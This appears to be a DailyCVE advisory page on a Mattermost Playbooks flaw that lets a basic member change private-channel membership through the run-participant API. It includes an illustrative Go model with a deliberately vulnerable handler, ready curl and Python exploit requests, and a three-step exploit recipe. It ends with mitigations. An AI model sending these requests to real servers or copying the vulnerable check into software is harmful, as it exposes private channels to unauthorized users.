How the CVE Works
The vulnerability in Mattermost stems from an improper authorization check when managing the participants of a playbook run. An authenticated user holding only basic member-level permissions can add or remove users from the private channel backing a run even after the "Manage Members" permission for that channel has been revoked, because the playbook run participant endpoints validate the request at run level without re-checking the caller's channel-level permission. An attacker therefore needs nothing more than an ordinary account and a crafted API request to alter channel memberships, which can expose the private channel's content to users who should not see it or pull guest users into channels they were never granted.
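To make the flawed check concrete, the following is an added example written for this page, not code taken from Mattermost's code base. It models a playbook run bound to a private channel and shows the participant-change handler once without and once with the channel-level permission check. The Store type, the ChangeParticipantVulnerable and ChangeParticipantFixed functions, the HasPermissionToChannel stand-in and the sample users "alice", "owner" and "bob" are all assumptions made for the illustration; only the two permission names mirror Mattermost's own manage_public_channel_members and manage_private_channel_members identifiers.

```go
package main

import (
	"errors"
	"fmt"
)

// Permission is a channel-level permission name. The two constants mirror the
// names Mattermost uses for managing channel membership; everything else here
// is a simplified in-memory model written for this page, not Mattermost's code.
type Permission string

const PermManagePublicChannelMembers Permission = "manage_public_channel_members"
const PermManagePrivateChannelMembers Permission = "manage_private_channel_members"

var ErrNotFound = errors.New("run not found")
var ErrForbidden = errors.New("forbidden: requester may not manage members of this channel")

type Channel struct {
	ID      string
	Private bool
	Members map[string]bool
}

// Run is a playbook run bound to one channel; changing its participants also
// changes that channel's membership, which is the action that must be authorized.
type Run struct {
	Channel      *Channel
	Participants map[string]bool
}

// Store stands in for the server's data and role layers. Grants lists the
// channel permissions a user really holds, keyed "user|channel|permission".
type Store struct {
	Runs   map[string]*Run
	Grants map[string]bool
}

// HasPermissionToChannel plays the role of the plugin API call of the same name.
func (s *Store) HasPermissionToChannel(userID, channelID string, perm Permission) bool {
	return s.Grants[userID+"|"+channelID+"|"+string(perm)]
}

// apply mutates both the run and its channel; add=false removes the user.
func apply(run *Run, userID string, add bool) {
	if add {
		run.Participants[userID], run.Channel.Members[userID] = true, true
	} else {
		delete(run.Participants, userID)
		delete(run.Channel.Members, userID)
	}
}

// ChangeParticipantVulnerable models the flaw: being a run participant is
// treated as sufficient to add or remove anyone from the run's channel.
func (s *Store) ChangeParticipantVulnerable(requesterID, runID, userID string, add bool) error {
	run := s.Runs[runID]
	if run == nil {
		return ErrNotFound
	}
	if !run.Participants[requesterID] {
		return ErrForbidden
	}
	apply(run, userID, add) // channel membership changed with no channel-level check
	return nil
}

// ChangeParticipantFixed adds the missing gate: before any mutation the
// requester must hold the manage-members permission matching the channel type.
func (s *Store) ChangeParticipantFixed(requesterID, runID, userID string, add bool) error {
	run := s.Runs[runID]
	if run == nil {
		return ErrNotFound
	}
	perm := PermManagePublicChannelMembers
	if run.Channel.Private {
		perm = PermManagePrivateChannelMembers
	}
	if !run.Participants[requesterID] || !s.HasPermissionToChannel(requesterID, run.Channel.ID, perm) {
		return ErrForbidden
	}
	apply(run, userID, add)
	return nil
}

// DemoStore builds the advisory's scenario from constructed sample data: a private
// channel whose run participant "alice" has had Manage Members revoked, while "owner" still holds it.
func DemoStore() *Store {
	ch := &Channel{ID: "priv-1", Private: true, Members: map[string]bool{"alice": true, "owner": true}}
	return &Store{
		Runs:   map[string]*Run{"run-1": {Channel: ch, Participants: map[string]bool{"alice": true, "owner": true}}},
		Grants: map[string]bool{"owner|priv-1|manage_private_channel_members": true},
	}
}

func main() {
	s := DemoStore()
	fmt.Println("vulnerable, alice adds bob:", s.ChangeParticipantVulnerable("alice", "run-1", "bob", true), s.Runs["run-1"].Channel.Members["bob"])
	fmt.Println("fixed, alice adds carol:", s.ChangeParticipantFixed("alice", "run-1", "carol", true), s.Runs["run-1"].Channel.Members["carol"])
}
```

The fixed variant refuses the request before it touches either the run or the channel, so a denied call leaves no partial state. That ordering matters because the damage in the vulnerable path is the channel side effect, not the run record itself, and a check placed after the run update would still leak the membership change.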
DailyCVE Form
Platform: Mattermost
Version: 9.11.0-10.8.0
Vulnerability: Incorrect Authorization
Severity: Moderate
Date: Jun 30, 2025
Prediction: Patch by Jul 15, 2025
What Undercode Say
# Raw request: path and payload as shown in the original post; on a real deployment
# Playbooks serves its REST API under its plugin route, so adjust the path accordingly.
curl -X POST "https://<mattermost>/api/v4/runs/<run_id>/participants" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"user_id":"attacker"}'

import requests

headers = {"Authorization": "Bearer <token>"}  # session token of a basic member account
resp = requests.post("https://<mattermost>/api/v4/runs/123/participants",
                     json={"user_id": "victim"}, headers=headers, timeout=10)
print(resp.status_code, resp.text)  # a 2xx here means the channel-level check was skipped
How to Exploit
1. Authenticate as an ordinary member whose "Manage Members" permission on the target private channel has been revoked.
2. Send an add or remove request to the playbook run participant API naming the target user.
3. The server applies the change to the run's channel without re-checking channel-level permissions, so the membership change goes through.
Protection from this CVE
- Upgrade to a patched Mattermost release.
- Until the upgrade is applied, restrict access to the playbook run participant APIs, for example at a reverse proxy.
- Audit private channel memberships and playbook run participants for additions or removals made by users who lack "Manage Members".
Impact
- Unauthorized access to private channel content.
- Privilege escalation: basic members regain a revoked "Manage Members" capability through the run API.
- Guest users pulled into channels they were never granted.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode